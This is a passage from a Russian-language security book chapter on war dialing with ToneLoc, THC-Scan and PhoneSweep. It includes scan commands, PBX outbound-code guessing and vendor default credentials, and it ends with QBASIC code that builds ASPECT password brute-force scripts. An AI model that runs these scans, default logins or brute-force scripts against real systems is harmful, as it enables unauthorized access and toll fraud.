    В следующих разделах будут подробно рассмотрены вопросы настройки каждого программного средства, чтобы читатели смогли легко воспользоваться этими программами. Однако в книге будут описаны далеко не все возможности этих программ.

    Программное обеспечение



    Поскольку сканирование телефонных номеров обычно выполняется ночью в течение небольших интервалов времени, то важным требованием к соответствующим программам является возможность гибкой настройки графика работы и запоминания уже отсканированных номеров. Бесплатные программы ToneLoc и THC-Scan регулярно сохраняют результаты своей работы в файлах данных, обеспечивая тем самым возможность продолжения работы после последующего перезапуска. Кроме того у них есть определенные средства для задания времени начала и окончания работы в течение одних суток. Однако для выполнения длительных операций сканирования в течение нескольких дней пользователь должен полагаться на возможности операционной системы по планированию выполнения заданий или написать специальный сценарий. Программа PhoneSweep позволяет полностью автоматизировать режим работы.
    Может показаться, что авторы предвзято относятся к программам ToneLoc и THC-Scan, однако они стараются быть объективными. Конечно, коммерческая программа PhoneSweep значительно облегчит жизнь консультантам по безопасности, которым необходимо получить максимальный результат ценой минимальных усилий. Возможности этой программы соответствуют ее цене, поэтому не стоит отказываться и от услуг бесплатных программ ToneLoc и THC-Scan. При регулярной интенсивной работе PhoneSweep себя окупает, однако не имеет смысла платить деньги, если аудит приходится выполнять лишь раз в полгода.

    Программа ToneLoc



    Одной из первых и наиболее популярных программ телефонного сканирования является утилита ToneLoc компании Minor Threat&Mucho Maas (название ToneLoc расшифровывается как Tone Locator). Эту программу можно найти на узле компании, а также на множестве хакерских узлов в Internet. Подобно многим программам-номеронабирателям, ToneLoc работает под управлением DOS (или в окне DOS операционной системы Win 9x или NT), а также с эмулятором DOS в UNIX. В течение многих лет эта утилита являлась эффективным средством для хакеров и консультантов по безопасности. К сожалению, создатели ToneLoc не следят за обновлением своей программы, и никто из сообщества специалистов по безопасности не принимал участия в ее разработке. Поэтому для оценки защищенности Web-узла лучше использовать более робастную программу THC-Scan.
    Программу ToneLoc легко установить и применять для базовых операций телефонного сканирования, однако использование расширенных возможностей этой программы требует некоторых навыков. Сначала из командной строки необходимо запустить простую утилиту TLCFG, выполняющую запись основных параметров конфигурации модема в файл TL.CFG, проверяемый при запуске ToneLoc (при этом должны быть установлены порт СОМ, адрес порта ввода-вывода и номер прерывания). Окно программы TLCFG.EXE показано на рис. 9.1.
    После этого из командной строки можно запустить саму программу ToneLoc, указав диапазон сканируемых телефонных номеров, имя файла данных для записи результатов и любые другие опции в следующем формате.

    ToneLoc [ФайлДанных] /М:[Маска] /R:[Диапазон]
    /X:[ИскМаска] /D:[ИскДиапазон]
    /С:[Коифиг] /#:[Число] /S:[ВремяНачала] /Е:[ВремяЭаверш]
    /Н:[Часы] /Т /К

    [ФайлДанных] - файл для хранения данных (возможно, маска)
    [Маска] - Маска для телефонных номеров в формате 555-ХХХХ
    [Диапазон] - диапазон телефонных номеров в формате 5000-6999
    [ИскМаска} - маска для исключения из сканирования в формате 1ХХХ
    [ИскДиапазон] - диапазон для исключения из сканирования в формате 2500-2699
    [Конфиг] - используемый файл конфигурации
    [Число] - количество выполняемых звонков в формате 250
    [ВремяНачала]- время начала сканирования в формате 9:30р
    [ВремяЗаверш]- время завершения сканирования в формате 6:45а
    [Часы] - максимальное число часов сканирования в формате 5:30
    (перекрывает [ВремяЗаверш])
    /Т = Tones, /К = Carriers (перекрывают данные файла конфигурации).

    Как будет видно из последующего материала, утилита THC-Scan использует очень близкий список параметров. В приведенном ниже примере утилита ToneLoc будет сканировать все телефонные номера от 555-0000 до 555-9999 и записывать информацию в файл test. На рис. 9.2 показана программа ToneLoc в действии.
    toneloc test /M:555-ХХХХ /R:0000-9999
    Утилита ToneLoc имеет множество других возможностей для более искушенных пользователей, описанных в руководстве пользователя (TLUSER.DOC), однако для выполнения базовых операций по подбору номера перечисленных параметров вполне хватает. Приведем еще один параметр, задающий период ожидания и используемый для тестирования сетей РВХ. Этот параметр позволяет дождаться гудка после набора основного номера и ввести код для выполнения исходящих звонков из внутренней телефонной станции РВХ.
    toneloc test /M:555-XXXXWxxx
    При таком формате команды набирается номер 555-9999, затем делается пауза для появления гудка, а затем проверяются все возможные комбинации из трех цифр (ххх) для получения кода для выполнения исходящих звонков из сети РВХ. Утилита ToneLoc может угадывать даже четырехзначные коды. Возможно, это убедит читателей в опасности использования удаленных соединений с сетями РВХ или хотя бы заставит использовать более длинные коды.

    Программа THC-Scan



    Слабые стороны утилиты ToneLoc компенсирует программа THC-Scan, созданная членом хакерской группы The Hacker's Choice из Германии Ван Хаузером (van Hauser) (http://www.infowar.co.uk/thc/). Подобно ToneLoc, утилита THC-Scan тоже настраивается и запускается в операционной системе DOS, в окне DOS Win 9x или с консоли Windows NT, а также с использованием эмулятора Dos под UNIX.



    Рис. 9.1. Использование программы TLCFG.EXE дм ввода конфигурационных параметров модема, применяемой утилитой ToneLoc



    Рис. 9.2. Утилита ToneLoc в процессе сканирования большого числа телефонных номеров в поисках других модемов

    Перед использованием утилиты THC-Scan сначала с помощью программы TS-CFG необходимо сгенерировать файл конфигурации (. CFG). Эта утилита конфигурации имеет более широкие возможности, чем программа TLCFG для ToneLoc. Большинство параметров конфигурации достаточно просты, но для нестандартной настройки потребуются исчерпывающие знания СОМ-портов. Основные параметры конфигурации перечислены в следующей таблице

    Порт СОМ
    Номер прерывания
    Порт ввода-вывода
    1
    4
    3F8
    2
    3
    2F8
    3
    4
    ЗЕ8
    4
    3
    2Е8

    Для определения этих параметров применяется утилита MOD-DET, включенная в комплект поставки THC-Scan (на сообщения Windows об ошибках можно не обращать внимания), результат работы которой выглядит следующим образом.

    MODEM DETECTOR v2.00 (c) 1996,98 by van Hauser/THC
    <vh@ reptile.rug.ac.be>
    Get the help screen with : MOD-DET.EXE ?
    Identifying Options...
    Extended Scanning : NO
    Use Fossil Driver : NO
    (Fossil Driver not present)
    Slow Modem Detect : YES
    Terminal Connect : NO
    Output Filename : <none>
    Autodetecting modems connected to COM 1 to COM 4 ...
    COM 1 - None Found
    COM 2 - Found! (Ready)
    [Irq: 3 | BaseAdress: $2F8]
    COM 3 - None Found
    COM 4 - None Found
    1 Modem(s) found.

    После создания файла конфигурации . CFG можно приступать к сканированию телефонных номеров. Синтаксис команды THC-Scan очень напоминает формат ToneLoc и имеет лишь несколько отличий. (Перечень возможных параметров слишком велик, поэтому здесь он приводиться не будет. Его можно найти в четвертой части руководства THC-SCAN.DOC, входящего в комплект поставки программы.) Даже в процессе работы THC-Scan очень напоминает утилиту ToneLoc (рис. 9.3).



    Рис. 9.3. Сканирование телефонных номеров с помощью утилиты THC-Scan

    Установка режима сканирования выполняется вручную с помощью ключей /s и /Е, задающих время начала и окончания процесса соответственно. Для повторения этого процесса каждый день нужно использовать встроенные средства планирования заданий операционной системы, например команду AT службы Scheduler системы Windows NT. Авторы книги обычно записывают параметры запуска THC-Scan в простой командный файл, который затем вызывается программой AT Scheduler. При планировании графика работы утилиты THC-SCAN.EXE необходимо помнить, что соответствующий файл конфигурации . CFG обязательно должен находиться в текущем каталоге, если не задана опция /!. Поскольку служба Scheduler запускает команды из каталога %systemroot%, для файла конфигурации утилиты THC-SCAN.EXE необходимо задать абсолютный путь, как показано в следующем примере.
    Приведем пример командного файла thc.bat.

    @@echo off
    rem Make sure thc-scan.exe is in path
    rem absolute path to .cfg file must be specified with /! switch if run
    from AT scheduler
    rem if re-running a scan, first change to directory with appropriate .DAT
    file and delete /P: argument
    C:\thc-scan\bin\THC-SCAN.EXE test /M:555-xxxx /R:0000-9999
    /!:C:\thc-scan\bin\THC-SCAN.CFG /P:test /F /3:20:00 /E:6:00

    После запуска этого командного файла утилита THC-Scan будет выполнять сканирование с 8 часов вечера до 6 часов утра. С помощью следующей команды можно обеспечить ежедневный запуск утилиты:

    at 7:58P /interactive /every:1 C\:thc-scan\bin\thc.bat

    Утилита THC-Scan создает файл данных . DAT и считывает из него информацию за предыдущие дни до тех пор, пока не отсканирует все номера диапазона. Не забудьте удалить всю информацию, оставшуюся после завершения работы утилиты THC-Scan, с помощью команды at /delete.
    Для пользователей, выполняющих сканирование телефонных номеров с помощью нескольких модемов или нескольких клиентов сети автор утилиты написал простой командный файл NETSCAN.BAT, содержащийся в архиве THC-MISC.ZIP, входящем в комплект поставки утилиты. Внеся в этот файл небольшие изменения, описанные во второй части руководства THC-SCAN.DOC, этот сценарий можно использовать для автоматического деления диапазона телефонных номеров и создания отдельных DAT-файлов для каждого клиента или модема. Чтобы настроить утилиту THC-Scan для использования нескольких модемов, выполните следующие действия.
    1. Создайте для каждого модема отдельный каталог, поместите в него копию утилиты THC-Scan и файл конфигурации, соответствующий этому модему.
    2. Внесите изменения в файл NETSCAN.BAT, описанные в руководстве THC-SCAN.DOC. Количество модемов задайте в строке SET CLIENTS=, расположенной в разделе [2] командного файла NETSCAN.BAT.
    3. Введите команду netscan.bat [маска соединения] [число модемов].
    4. Поместите каждый файл . DAT в каталог соответствующего модема. Например, при использовании команды netscan 555-XXXX 2 для двух модемов результирующий файл 2555xxxx.DAT поместите в каталог, соответствующий модему № 2 (например, \thc-scan\bin2).
    При поиске телефонных номеров, используемых для модемных соединений, утилита THC-Scan может отправлять ответившему модему несколько строк, заданных в файле конфигурации. Этот режим можно установить с помощью параметра carrier Hack Mode утилиты TS-CFG, а само содержимое этих строк — с помощью параметра Nudge. По умолчанию предлагается следующее сообщение.

    ^~^~^~^~^~^M^~^M?^M^~help^M^~^~^~guest^M^~guest^М^~INFO^M^MLO

    (^~ означает паузу, а ^М — возврат каретки). Стандартный текст сообщения во многих случаях работает достаточно хорошо, но для достижения конкретной цели этот текст можно изменить.
    По завершении процесса сканирования необходимо проанализировать различные журналы. Важным преимуществом утилиты THC-Scan является возможность записи вводимой информации в текстовый файл, пригодный для использования в дальнейшем. Однако в процессе управления данными много информации приходится вводить вручную. Утилита THC-Scan может генерировать огромные объемы информации для последующего анализа, включая список отсканированых телефонных номеров, найденные модемы, выявленные типы систем и т.д. Вся эта информация записывается в файлы трех типов: DAT-файлы, файлы базы данных . D3, которые затем можно импортировать в ODBC-совместимую базу данных (эта опция задается с помощью ключа /F), и несколько LOG-файлов, содержащих списки телефонных номеров, которые были заняты, по которым ответил модем, а также перечень откликов модемов. Файл базы данных можно анализировать в любой системе управления базой данных, но в нем отсутствует информация об откликах модемов. Информация об откликах модемов содержится в журнале CARRIERS . LOG, и ее согласование с информацией базы данных надо проводить вручную. Такой анализ приглашений ответившей системы все равно зачастую приходится выполнять вручную для дальнейшего проникновения в систему, однако для больших диапазонов сканируемых номеров очень сложно вручную составить исчерпывающий отчет, отражающий основные результаты.
    Вопрос управления данными значительно усложняется при использовании нескольких модемов. Как видно из описанного выше процесса, для каждого модема настраивается и запускается свой экземпляр утилиты THC-Scan и общий диапазон телефонных номеров нужно вручную разделить между модемами. Результирующие DAT-файлы можно объединить с помощью утилиты DAT-MERGE.EXE, входящей в комплект поставки утилиты THC-Scan, однако файлы журналов регистрации ответов модемов тоже нужно объединять вручную.
    Невзирая на эти неудобства, утилита THC-Scan является чудесным бесплатным средством для телефонного сканирования и ее автор достоин наилучших слов благодарности. Как будет видно из последующего материала, продукты, обладающие большей простотой и эффективностью, стоят достаточно дорого.

    Программа PhoneSweep



    Если, с вашей точки зрения, использование утилиты THC-Scan требует слишком больших усилий, то вам подойдет программа PhoneSweep. Эту программу распространяет компания Sandstorm Enterprises (http://www.sandstorm.net). Вопросам установки и использования бесплатных программ телефонного сканирования было уделено достаточно много внимания. Рассказ о PhoneSweep будет значительно короче, поскольку практически все понятно из самого интерфейса пользователя (рис. 9.4).
    Основными преимуществами PhoneSweep являются простой графический интерфейс, автоматическое планирование заданий, возможность проникновения в систему, одновременная поддержка нескольких модемов и изящная отчетность. Для каждого модема задается диапазон номеров (профиль) . Текущая версия программы поддерживает до четырех модемов. С помощью флажков Business Hours, Outside Hours и Weekends утилиту PhoneSweep легко настроить для использования в рабочее время, нерабочие часы и выходные, как показано на рис. 9.5. Конкретные часы рабочего времени задаются во вкладке Options>Time. Утилита PhoneSweep будет непрерывно выполнять сканирование в указанный период времени (обычно это нерабочее время или выходные, задаваемые флажками Outside Hours и Weekends) до тех пор, пока не будет проверен весь диапазон.
    Утилита PhoneSweep различает 205 различных типов устройств удаленного доступа (их полный список приводится по адресу http://www.sandstorm.net/phoneswep/ sysids.shtml). Она выполняет идентификацию, сравнивая текстовые или бинарные строки, получаемые в качестве отклика модема, с базой данных известных откликов. Если отклик модема настраивался вручную, то утилита PhoneSweep его не распознает. Чтобы обеспечить идентификацию всех возможных систем, нужно включить в отчет все отклики всех возможных модемов, а затем проанализировать этот список вручную.



    Рис. 9.4. Графический интерфейс утилиты PhoneSweep значительно превосходит возможности интерфейса бесплатных программ и включает множество средств, повышающих эффективность и облегчающих использование



    Рис. 9.5. Утилита PhoneSweep позволяет легко настраивать график работы

    Помимо выявления стандартных модемов, утилита PhoneSweep позволяет реализовывать типичные атаки против них. В текстовом файле bruteforce.txt, расположенном в каталоге приложения, содержится перечень имен пользователей и паролей, которые передаются в ответ на приглашение модема. Если соединение разрывается, утилита PhoneSweep снова набирает номер и пробует воспользоваться следующим вариантом отклика, пока не будет исчерпан весь список (используя эту утилиту для тестирования защищенности своего сервера удаленного доступа, остерегайтесь возможности блокирования учетной записи). Одно только это средство стоит денег, затраченных на покупку PhoneSweep, поскольку позволяет автоматизировать операции. которые обычно выполняются вручную (см. следующий раздел).
    Еще одним важным преимуществом утилиты PhoneSweep является встроенная база данных SQL для регистрации результатов сканирования. Благодаря ее наличию отпадает необходимость просмотра текстовых файлов вручную или приведения данных из разных форматов к единому формату электронных таблиц (что приходится делать при использовании бесплатных программ). Здесь имеется лишь один шаблон отчета, однако он очень изящен, содержит действительно полезную информацию в табличном виде, а также возможность добавления в отчет откликов идентифицированных модемов (приложение А) и всего списка телефонных номеров (приложение В) в формате RTF. Фрагмент отчета утилиты PhoneSweep приведен на рис. 9.6.
    Конечно, основным отличием между PhoneSweep и бесплатными программами является цена. Во время написания этой книги существовало две версии программы PhoneSweep: PhoneSweep Basic, поддерживающая один модем и до 800 номеров на профиль стоимостью $980 (стоимость дополнительной поддержки этой версии в течение года составляет $196), и PhoneSweep Plus, поддерживающая до 4 модемов и 10000 номеров на каждый профиль стоимостью $2800 (стоимость дополнительной поддержки этой версии в течение года составляет $560). Для защиты от нелицензионного копирования программы используется аппаратная заглушка, подключаемая к параллельному порту, без которой программа не работает. Учитывая стоимость усилий, затраченных на установку, настройку и обработку результатов бесплатных программ, цена $2800 выглядит не столь устрашающе.



    Рис. 9.6. Небольшой фрагмент отчета утилиты PhoneSweep одновременно демонстрирует уровень детализации и обобщения результатов единственного встроенного шаблона отчета

    Интересные результаты сравнения программ PhoneSweep и THC-Scan, полученные, из заинтересованного источника — от компании Sandstorm Enterprises, Inc., можно найти по адресу http: //geek-girl. com/bugtraq/1998_4/0770 .html.
    Но какое бы средство мы ни выбрани, важно понимать, что мы хотим получить в итоге. Об этом будет рассказано в следующем разделе.

    Способы проникновения в систему через модем



    Сканирование телефонных номеров преследует цель выявить потенциальные точки для последующего вторжения в систему через модемное соединение, однако чаще всего для определения степени уязвимости удаленного соединения требуется внимательный анализ отчетов. Например, из следующего фрагмента файла CARRIERS . LOG, сгенерированного утилитой THC-Scan, видны типичные отклики модемов. Для краткости этот файл несколько подредактирован. Подобные данные содержатся и в приложении А отчета утилиты PhoneSweep.

    23-05-1997 14:57:50 Dialing... 95552851
    CONNECT 57600
    НР995-400:_
    Expected a HELLO command. (CIERR 6057)
    23-05-1997 20:08:39 Dialing... 95552349
    CONNECT 57600
    @ Userid:
    Password?
    Login incorrect
    23-05-1997 21:48:29 Dialing... 95552329
    CONNECT 57600
    Welcome to 3Com Total Control HiPer ARC (TM)
    Networks That Go The Distance (TM)
    login:
    Password:
    Login Incorrect
    23-05-1997 21:42:16 Dialing... 95558799
    CONNECT 57600
    ._Please press <Enter>..._I
    PJack Smith_JACK SMITH
    [CARRIER LOST AFTER 57 SECONDS]

    Авторы умышленно выбрали эти примеры, чтобы показать неоценимое значение опыта работы с различными серверами удаленных соединений и операционными системами. Например, первый отклик, похоже, поступил от системы HP (HP995-40C), однако последующая строка с информацией о команде HELLO выглядит странновато. При установке соединения с этой системой вручную с помощью стандартного программного обеспечения (авторы книги предпочитают программу Procomm Plus, распространяемую компанией Symantec Corp, и представленную по адресу http://www.Symantec, соm/рrосоrоm/procomm.html, поскольку с ее помощью можно эмулировать терминал VT-100 на основе протокола ASCII) пользователя ожидает столь же непонятный результат. Для прояснения ситуации взломщик должен быть знаком с системами МРЕ-XL от Hewlett-Packard и знать, что в ответ на приглашение нужно ввести команду HELLO имя. ПОЛЬЗ, а затем пароль. Поэтому имеет смысл воспользоваться утилитой Procomm Plus и ввести следующую информацию.

    CONNECT 57600
    НР995-400: HELLO FIELD.SUPPORT
    PASSWORD» TeleSup

    В качестве имени пользователя и пароля в HP-системах по умолчанию применяются FIELD. SUPPORT и TeleSup соответственно. Таким образом, при наличии богатого опыта и затрате минимальных усилий можно выявить бреши в таких местах, где неподготовленные пользователи обнаружат лишь непробиваемую стену.
    Второй пример отклика в приведенном фрагменте отчета несколько проще. Синтаксис @Userid свидетельствует об обнаружении сервера удаленного доступа LANRover производства компании Shiva Corp. (теперь она является частью корпорации Intel). Утилита PhoneSweep автоматически определяет системы LANRover по этой строке. На основе этой информации и в результате изучения Web-узла http: //www.shiva.com хакер сможет узнать, что системы LANRover можно сконфигурировать для аутентификации удаленных пользователей. При этом зачастую используется имя пользователя supervisor или admin с паролем NULL. Вы даже представить себе не можете, как часто такие данные срабатывают против ленивых администраторов.
    Третий пример демонстрирует, насколько полезными могут оказаться даже элементарные знания о производителе и модели системы. Широко известно, что для устройств удаленного доступа 3Com TotalControl HiPer ARC существует "резервная" учетная запись adm с паролем NULL (http://geek-girl.com/bugtraq/1998_4/0682.html). Поэтому такие системы являются широко открытыми (если этот просчет еще не устранен).
    В последнем примере зафиксирован отклик программы управления удаленным доступом pcAnywhere от компании Symantec. Если владелец системы Джек Смит не поленился установить хотя бы символический пароль, то система практически неуязвима. Но двое из троих пользователей pcAnywhere игнорируют подобные меры (и это действительно так!). Более подробная информация о pcAnywhere и других подобных программах содержится в главе 13.
    Выше уже упоминалось о том, что интерес для хакеров представляют не только модемы, но и сети РВХ, а также системы голосовой почты. В частности, системы РВХ, сконфигурированные для обеспечения удаленных исходящих соединений, при вводе корректного кода отвечают гудком (см. выше описание программы ToneLoc). Поэтому при неправильной настройке эти средства обеспечивают взломщику возможность совершения телефонных звонков в любую точку мира за чужой счет. Не забывайте об этом, проверяя защищенность своей системы.
    Описание всевозможных откликов удаленных систем могло бы занять всю оставшуюся часть этой книги, однако даже из этого краткого примера видно, какие типы систем можно обнаружить при проверке защищенности вашей организации. Помните о возможных брешах в защите и консультируйтесь со специалистами, включая разработчиков.
    А что делать, если имя пользователя и пароль угадать не удается? Тогда следует попробовать атаковать в лоб. Как уже отмечалось, утилита PhoneSweep содержит встроенные средства подбора пароля, но не исчерпывает всех возможностей. Можно воспользоваться другими средствами, например Login Hacker от ТНС, представляющим собой компилятор языка сценариев и включающим несколько примеров таких сценариев. Авторам книги приходилось видеть и сложные сценарии, написанные на языке ASPECT, компании Procomm Plus. Эти программы трижды пытаются угадать пароль, Снова устанавливают соединение при его разрыве целевой системой и т.д. Однако такое вмешательство для удаленных систем нежелательно и даже противоправно, если эти попытки предпринимаются без согласия владельца системы.

    Доморощенный способ: примитивное написание сценариев



    После получения результатов сканирования телефонных номеров нужно систематизировать их в так называемые домены (domain). Как уже отмечалось, неоценимую помощь в этом окажет опыт работы с различными типами серверов удаленных соединений и операционных систем. Выбор системы для последующего проникновения зависит от множества факторов, в том числе от того, сколько времени хакер готов посвятить своим экспериментам, какая полоса пропускания имеется в его распоряжении, а также от его интуиции и профессионализма в написании сценариев.
    Первым важным шагом на пути систематизации результатов в целях тестирования является установка соединений с обнаруженными модемами. При этом нужно постараться определить характеристики соединения, чтобы затем суметь сгруппировать соединения в домены для тестирования. Модемное соединение можно определить по нескольким существенным признакам, которые и надо постараться выявить. Приведем общий перечень таких признаков.

    •  Наличие интервала ожидания или порогового числа попыток.
    •  После превышения порогового значения соединение больше не используется.
    •  Соединение доступно только в определенные часы.
    •  Допустимость корректных предположений об уровне аутентификации: т.е. наличие или отсутствие пароля.
    •  Уникальность метода идентификации, в частности по принципу запрос/отклик (например, с использованием идентификаторов защиты (Security ID).
    •  Возможность определения максимального числа символов в отклике или пароле.
    •  Правомочность предположений о наличии специальных или алфавитно-цифровых символов в поле пароля или идентификаторе пользователя.
    •  Возможность получения дополнительной информации при вводе различных стандартных комбинаций клавиш, таких как <Ctrl+C>, <CtrI+Z>, <?> и т.п.
    •  Наличие идентификационных маркеров или их изменение с момента первых попыток проникновения, а также содержащаяся в них информация. Это может оказаться полезным при угадывании недостающей информации или при решении вопросов социальной инженерии.

    Получив эту информацию, можно приступать к систематизации соединений в так называемые домены для проникновения по телефонным линиям. Для иллюстрации рассмотрим четыре категории соединений или домена для дальнейшего проникновения. При этом сразу же исключим из рассмотрения так называемый домен ЛДП (легко доступный плод). Остальные домены основаны на различных механизмах аутентификации и ограничении числа попыток доступа к этим механизмам. В целом домены можно классифицировать следующим образом.

    1. ЛДП
    Легко угадываемые и часто используемые пароли для идентификации (угадать их поможет опыт)
    2. Одинарная идентификация, неограниченное число попыток
    Системы с одним типом пароля или идентификатора пользователя. Модем не отключается после заданного числа неудачных попыток установки соединения
    3. Одинарная идентификация, ограниченное число попыток
    Системы с одним типом пароля или идентификатора пользователя. Модем отключается после заданного числа неудачных попыток установки соединения
    4. Двойная идентификация, неограниченное число попыток
    Системы с двумя типами механизмов аутентификации, например с использованием идентификатора пользователя и пароля. Модем не отключается после заданного числа неудачных попыток установки соединения
    5. Двойная идентификация, ограниченное число попыток
    Системы с двумя типами механизмов аутентификации, например с использованием идентификатора пользователя и пароля. Модем отключается после заданного числа неудачных попыток установки соединения

    В целом чем ниже в списке находится домен, тем сложнее проникнуть в относящуюся к нему систему, и тем более сложные сценарии требуется для этого применять. Рассмотрим эти домены подробнее.

    Легко доступный плод



    Для проникновения в систему, относящуюся к этому домену, требуется минимум усилий. Если хакер удачлив — его неминуемо ждет успех. Для проникновения в систему не требуется писать никаких сценариев — нужно лишь угадать идентификатор пользователя или пароль. В книге нельзя перечислить все типичные идентификаторы и пароли. Угадать эту информацию поможет опыт и интуиция. Хорошей отправной точкой в этом процессе может послужить идентификация подписи. В табл. 10.3 следующей главы приводится полезный список, с которого можно начать дальнейшие исследования. Однако каким бы списком ни воспользовался читатель, главное — быстро проверить все применяемые по умолчанию варианты и в случае неудачи перейти к следующему типу домена.

    Одинарная идентификация, неофаниченное число попыток



    Это первый серьезный домен (ЛДП не в счет), который зачастую труднее всего идентифицировать. Дело в том, что многие системы, которые, на первый взгляд, принадлежат этому домену (листинг 9.1 А), после ввода корректного идентификатора требуют повторной аутентификации (листинг 9.1 Б). Пример системы, действительно относящейся к этой категории, приводится в листинге 9.2. Эта система использует один механизм аутентификации и допускает неограниченное число попыток установки соединения.
    Листинг 9.1А. Пример системы, которая, на первый взгляд, относится к первому домену, но меняет свое поведение после ввода корректного идентификатора пользователя или пароля

    XX-Jul-XX 09:51:08 91ХХХ5551234
    С: CONNECT 9600/ARQ/V32/LAPM
    @ Userid:
    @ Userid:
    @ Userid:
    @ Userid:
    @ Userid:
    @ Userid:
    @ Userid:

    Листинг 9.1 Б. Пример изменения поведения системы после ввода корректного идентификатора пользователя или пароля 

    XX-Jul-XX 09:55:08 91ХХХ5551234
    С: CONNECT 9600/ARQ/V32/LAPM
    @ Userid: lanroverl
    Password: xxxxxxxx

    В следующем примере система действительно относится к первому домену, поскольку для получения доступа к ней требуется только ввести пароль. Заметим также, что эта система допускает неограниченное число попыток установки соединения. Для проникновения в такую систему нужно запустить сценарий подбора пароля.
    Листинг 9.2. Пример поведения системы, действительно относящейся к первому домену

    XX-Jul-XX 03:45:08 91ХХХ5551235
    С: CONNECT 9600/ARQ/V32/LAPM
    Enter Password: Invalid Password.
    Enter Password: Invalid Password.
    Enter Password: Invalid Password.
    Enter Password: Invalid Password.
    Enter Password: Invalid Password.

    Для проникновения в систему, представленную в этом примере, нужно написать сценарий, который выполнялся бы простыми утилитами DOS. Приведенный ниже фрагмент — это не сложная программа, а простой пример сценария, повторяющего попытки регистрации до тех пор, пока не будет исчерпан его словарь. Как уже отмечалось, при написании сценариев для модемных соединений чаще всего применяется программа Procomm Plus со встроенным языком сценариев ASPECT. Система Procomm Plus известна уже в течение многих лет и хорошо зарекомендовала себя при тестировании как на ранних версиях DOS, так и на новейших версиях 32-разрядных операционных систем. Следует отметить также прекрасную справочную систему и документацию по языку ASPECT.
    Для начала создадим исходный файл сценария, а затем скомпилируем его в объектный модуль. Полученный модуль протестируем на 10-20 паролях, а затем на большом словаре. Таким образом, сначала создадим файл исходного кода сценария на языке ASPECT. В старых версиях Procomm Plus для исходных файлов сценариев использовалось расширение .ASP, а для объектных файлов — .ASX, а в новых версиях — .WAS и .wsx соответственно. Однако независимо от версии нам предстоит создать сценарий, который будет поддерживать приведенный выше диалог и пользоваться большим словарем паролей.
    Написание сценариев — это программирование сравнительно низкого уровня. Их можно писать с помощью любого стандартного редактора. Относительно сложным моментом является включение в сценарий переменной, отвечающей за считывание пароля из словаря. Система Procomm Plus поддерживает включение в сценарий переменных, отвечающих за считывание данных из внешних файлов (например, из словаря) в процессе работы сценария. Однако опыт авторов показывает, что при включении словаря в текст сценария уменьшается число программных переменных и возрастает вероятность успеха.
    Поскольку основная задача — написание сценария низкого уровня, основанного на применении ASCII-кодов, для его создания можно воспользоваться языком QBASIC для DOS. В следующем листинге приводится содержимое простого QBASIC-файла, генерирующего сценарий обработки ситуации из предыдущего примера. Назовем этот файл 5551235.ВАЗ (.ВАЗ — стандартное расширение для программ на языке QBASIC). Эту программу можно использовать для создания сценария проникновения в систему, относящуюся к первому домену. Эта программа создает исходный файл сценария на языке ASPECT для Procomm Plus 32 (.WAS). Для полноты сценария необходимо сначала создать элемент соединения 5551235 в соответствующем каталоге Procomm Plus. Элемент соединения обычно содержит все характеристики соединения и позволяет пользователю задать файл журнала. Как будет видно из дальнейшего изложения, наличие журнала очень важно при реализации описываемого подхода.

    OPEN "5551235.was" FOR OUTPUT AS #2
    OPEN "LIST.txt" FOR INPUT AS tl
    PRINT #2, "proc main"
    PRINT #2, "dial
    DATA " + CHR$(34) + "5551235" + CHR$(34)
    DO UNTIL EOF(l)
    LINE INPUT #1, in$
    inS = LTRIM$(in$) + "ЛМ"
    PRINT #2, "waitfor " + CHR$(34) + "
    Enter Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + inS + CHR$(34)
    LOOP
    PRINT #2, "endproc"

    Файл словаря может содержать любое количество типичных паролей, например:

    apple
    applel
    apple2
    applepie
    applepies
    applepiesl
    applepies2
    applicate
    applicates
    application
    applicationl
    applonia
    applonial

    и т.д.
    Размер словаря может быть любым, здесь можно проявлять любое творчество. Если известна какая-либо конкретная информация о целевой организации, например имена сотрудников или название местной спортивной команды, то в словарь следует добавить и ее. Главное, создать как можно более эффективный словарь.
    Затем нужно взять готовый файл 5551235.WAS, скомпилировать его с использованием компилятором языка ASPECT и запустить на выполнение.

    Поскольку сценарий предназначен для подбора паролей, перед началом его выполнения нужно открыть файл журнала регистрации событий. Тогда весь процесс работы сценария будет фиксироваться в файле. Позднее содержимое файла журнала можно проанализировать и определить правильный пароль. На первый взгляд, может показаться, что журнал регистрации вовсе не нужен. Достаточно просто выполнять сценарий до успешной попытки (получения корректного пароля). Однако это невозможно, поскольку заранее нельзя определить, что произойдет после ввода корректного пароля, т.е. нельзя сформулировать условие успешной попытки. Если же известно, к какому результату должен привести ввод корректного пароля, то в файле сценария на языке ASPECT можно использовать условие WAITFOR и задать соответствующее условие. При таком подходе остается меньше шансов для случайностей. Авторы являются сторонниками журналов регистрации. Хотя такие журналы сложно анализировать — их легко создавать. При этом, конечно, предполагается, что дополнительные сведения о соединении отсутствуют. Те, кто работал консультантом по безопасности или аудитором и сотрудничал с людьми, знающими характеристики удаленных соединений своих организаций, могут использовать совсем другие подходы.

    Следует упомянуть еще о некоторых особенностях работы сценариев. Наличие шума на линии между ожидаемыми символами может свести на нет всю работу сценария. Поэтому, прежде чем запускать сценарий в действие, желательно несколько раз протестировать его на небольших словарях из 10-20 паролей и удостовериться в его работоспособности.

    Одинарная идентификация, ограниченное число попыток



    Для проникновения в систему, относящуюся ко второму типу доменов, требуется несколько больше времени, поскольку в сценарий нужно добавить новые элементы. Пример работы такой системы приведен в листинге 9.3. Несложно заметить небольшие отличия в поведении этой и рассмотренной выше системы первого типа. В данном примере после третьей попытки установки соединения появляется сообщение АТНО. Это типичная последовательность символов, означающая разрыв соединения для модемов Hayes. Значит, данное соединение разрывается после трех неудачных попыток аутентификации. Число попыток может варьироваться, однако в этом примере будет показано, как восстановить соединение при его разрыве после X (в данном примере 3-х) неудачных попыток. Для этого нужно добавить небольшой фрагмент кода в рассмотренный выше сценарий. Такой пример содержится в листинге 9.4. Здесь предпринимается три попытки угадать пароль, а затем соединение устанавливается снова и процесс повторяется.
    Листинг 9.3. Пример поведения системы, относящейся ко второму типу домена

    XX-Jul-XX 03:45:08 91ХХХ5551235 С:CONNECT 9600/ARQ/V32/LAPM
    Enter Password: Invalid Password.
    Enter Password:
    Invalid Password.
    Enter Password:
    Invalid Password.
    ATHO

    (Отметим важную характеристику — последовательность АТНО, свидетельствующую о разрыве соединения модема Hayes.)
    Листинг 9.4. Пример программы на языке QBASIC (файл 5551235.BAS)

    OPEN "5551235.was" FOR OUTPUT AS #2
    OPEN "LIST.txt" FOR INPUT AS #1
    PRINT #2, "proc main"
